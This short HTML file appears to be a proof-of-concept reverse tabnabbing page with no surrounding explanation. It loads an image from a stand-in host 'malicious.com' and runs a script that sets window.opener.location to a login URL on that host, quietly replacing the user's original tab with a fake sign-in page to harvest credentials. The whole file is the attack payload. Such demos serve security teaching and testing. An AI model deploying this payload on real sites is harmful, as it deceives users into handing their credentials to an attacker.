<!DOCTYPE html>
<html>
<head>
</head>
 <body>
    <img src="http://malicious.com:8070/public/images/sq.jpeg">
  <script>
  window.opener.location = "http://malicious.com:8070/login";
  </script>
 </body>
</html>

